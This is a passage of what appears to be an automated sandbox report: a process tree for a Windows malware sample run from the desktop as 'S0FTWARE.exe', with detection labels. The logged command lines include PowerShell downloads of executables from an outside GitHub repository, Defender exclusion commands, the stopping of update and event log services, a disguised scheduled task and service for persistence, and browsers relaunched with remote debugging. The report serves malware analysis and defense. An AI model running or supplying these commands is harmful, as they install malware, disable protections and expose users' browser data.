        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3500 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4920
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4308,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4336 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:1468
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4620,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4708 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5452
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5328,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5340 /prefetch:8
        5⤵
        
        PID:3584
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5440,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5448 /prefetch:8
        5⤵
        
        PID:4896
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:880
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:5020
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffbd1dbf208,0x7ffbd1dbf214,0x7ffbd1dbf220
        6⤵
        
        PID:5208
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1916,i,17321579858554161019,2255846715723391771,262144 --variations-seed-version --mojo-platform-channel-handle=2976 /prefetch:3
        6⤵
        
        PID:4400
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2948,i,17321579858554161019,2255846715723391771,262144 --variations-seed-version --mojo-platform-channel-handle=2944 /prefetch:2
        6⤵
        
        PID:2348
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2268,i,17321579858554161019,2255846715723391771,262144 --variations-seed-version --mojo-platform-channel-handle=2780 /prefetch:8
        6⤵
        
        PID:220
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3520,i,17321579858554161019,2255846715723391771,262144 --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4948
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3536,i,17321579858554161019,2255846715723391771,262144 --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6008
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\o8qq1" & exit
      4⤵
      PID:6136
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        5⤵
        Delays execution with timeout.exe
        
        PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\opigwliiren.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\opigwliiren.exe'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4880
- - C:\Users\Admin\AppData\Local\glrfnz\aaccaa.exe
    "C:\Users\Admin\AppData\Local\glrfnz\aaccaa.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4696
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5660
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3204
- - C:\Users\Admin\AppData\Local\glrfnz\opigwliiren.exe
    "C:\Users\Admin\AppData\Local\glrfnz\opigwliiren.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:4496
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5012
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:6044
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3600
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2100
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:5868
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:5820
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:3392
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:5664
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3380
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:6000
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:2220
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
      4⤵
      Launches sc.exe
      PID:3204
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:5688
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:5748
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
      4⤵
      Launches sc.exe
      PID:512

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5952

C:\Users\Admin\AppData\Roaming\service.exe
C:\Users\Admin\AppData\Roaming\service.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2192
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5664
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3588

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4960

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5472

C:\Users\Admin\Desktop\egg\S0FTWARE.exe
"C:\Users\Admin\Desktop\egg\S0FTWARE.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:3336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\eicgfz', 'C:\Users', 'C:\ProgramData'"
  2⤵
  PID:5488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\eicgfz', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\kbfkegxz.exe'"
  2⤵
  PID:3928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\kbfkegxz.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\bxawtnntp.exe'"
  2⤵
  PID:5416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\bxawtnntp.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Suspicious use of AdjustPrivilegeToken
    PID:5860
- C:\Users\Admin\AppData\Local\eicgfz\kbfkegxz.exe
  "C:\Users\Admin\AppData\Local\eicgfz\kbfkegxz.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5076
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:1844
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbca40dcf8,0x7ffbca40dd04,0x7ffbca40dd10
      4⤵
      PID:4152
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1564,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2212 /prefetch:3
      4⤵
      PID:3004
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2108,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2104 /prefetch:2
      4⤵
      PID:3504
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2400,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2544 /prefetch:8
      4⤵
      PID:5884
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3260 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4640
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3288 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:700
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4280 /prefetch:2
      4⤵
      Uses browser remote debugging
      PID:5848
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4628,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4596 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5172
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5172,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5184 /prefetch:8
      4⤵
      PID:1140
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5508,i,11595865976084335221,15584633879994945035,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5520 /prefetch:8
      4⤵
      PID:4728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\niikyecwpyo.exe'"
  2⤵
  PID:4024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil3.exe' -OutFile 'C:\Users\Admin\AppData\Local\eicgfz\niikyecwpyo.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1092
- C:\Users\Admin\AppData\Local\eicgfz\bxawtnntp.exe
  "C:\Users\Admin\AppData\Local\eicgfz\bxawtnntp.exe"
  2⤵
  PID:4468
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    PID:4820
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5032
- C:\Users\Admin\AppData\Local\eicgfz\niikyecwpyo.exe
  "C:\Users\Admin\AppData\Local\eicgfz\niikyecwpyo.exe"
  2⤵
  PID:5980

C:\ProgramData\GoogleUP\Chrome\Updater.exe
C:\ProgramData\GoogleUP\Chrome\Updater.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4332
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2428
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1996
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3528
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2152
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2700
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1584
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4292
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1000
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:332
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4348
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2880
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5012
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2664

C:\Users\Admin\Desktop\egg\S0FTWARE.exe
"C:\Users\Admin\Desktop\egg\S0FTWARE.exe"
1⤵
PID:3512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\tiyephlpp', 'C:\Users', 'C:\ProgramData'"
  2⤵
  PID:2152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\tiyephlpp', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\tiyephlpp\asxvoapy.exe'"
  2⤵
  PID:4128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\tiyephlpp\asxvoapy.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\tiyephlpp\ezshtssebmgo.exe'"
  2⤵
  PID:2044
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\tiyephlpp\ezshtssebmgo.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5976
- C:\Users\Admin\AppData\Local\tiyephlpp\asxvoapy.exe
  "C:\Users\Admin\AppData\Local\tiyephlpp\asxvoapy.exe"
  2⤵
  PID:3540
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:3476
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbca40dcf8,0x7ffbca40dd04,0x7ffbca40dd10
      4⤵
      PID:5608
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:4984
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbca40dcf8,0x7ffbca40dd04,0x7ffbca40dd10
      4⤵
      PID:4476
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,5582364626696228104,8263534744667878023,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2160 /prefetch:3
      4⤵
      PID:3188
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
